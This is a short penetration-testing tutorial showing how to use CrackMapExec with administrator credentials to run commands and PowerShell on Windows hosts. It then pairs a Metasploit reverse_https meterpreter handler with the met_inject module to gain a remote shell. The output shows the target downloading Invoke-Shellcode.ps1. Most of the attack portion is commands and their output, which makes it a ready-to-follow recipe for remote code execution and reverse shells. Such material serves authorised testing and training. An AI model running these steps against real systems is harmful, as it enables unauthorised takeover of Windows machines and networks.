CrackMapExec - Meterpreter shell


This article was written by Jeff Warren which you can find here

Check out CrackMapExec Ultimate Guide & our Cheatsheet
For installation Check the GitHub Repo

Getting A meterpreter shell with CrackMapExec

Crackmapexec is a swiss army knife for pentesting Windows/Active Directory environments. Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services.

Testing creds

So We’ve got some creds we want to check against a target, lets run a couple of commands to get a whoami & powershell infomation.

crackmapexec -u Administrator -p 'P@ssw0rd' -x whoami

You can also directly execute PowerShell commands using the -X flag:

#~ crackmapexec -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
06-05-2016 14:36:06 CME WIN7BOX         [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)
06-05-2016 14:36:06 CME WIN7BOX         [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
06-05-2016 14:36:10 CME WIN7BOX         [+] Executed command 
06-05-2016 14:36:10 CME WIN7BOX         Name                           Value
06-05-2016 14:36:10 CME WIN7BOX         ----                           -----
06-05-2016 14:36:10 CME WIN7BOX         CLRVersion                     2.0.50727.5420
06-05-2016 14:36:10 CME WIN7BOX         BuildVersion                   6.1.7601.17514
06-05-2016 14:36:10 CME WIN7BOX         PSVersion                      2.0
06-05-2016 14:36:10 CME WIN7BOX         WSManStackVersion              2.0
06-05-2016 14:36:10 CME WIN7BOX         PSCompatibleVersions           {1.0, 2.0}
06-05-2016 14:36:10 CME WIN7BOX         SerializationVersion 
06-05-2016 14:36:10 CME WIN7BOX         PSRemotingProtocolVersion      2.1
06-05-2016 14:36:10 [*] KTHXBYE!

Setting Up Metasploit Handler

Now comes the turn to get a meterpreter shell , so start  metasploit with command msfconsole in a new terminal and set up the reverse handler

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost
set lport 444

Using the Met-Inject module to get a shell

Now by using the met_inject Module we can get a meterpreter shell. This will use smbexec which executes commands by creating and running a service.

sudo cme -u 'Administrator' -p 'P@ssw0rd' -M met_inject -o LHOST= LPORT=444
CME MEETINGROOM     [*] Windows 6.3 Build 9600 (name:MEETINGROOM) (domain:SE)
CME MEETINGROOM     [+] MEETINGROOM\Administrator:PASS (Pwn3d!)
METINJECT MEETINGROOM     [+] Executed payload
METINJECT                                      [*] Waiting on 1 host(s)
METINJECT                   [*] - - "GET /Invoke-Shellcode.ps1 HTTP/1.1" 200 -

comments powered by Disqus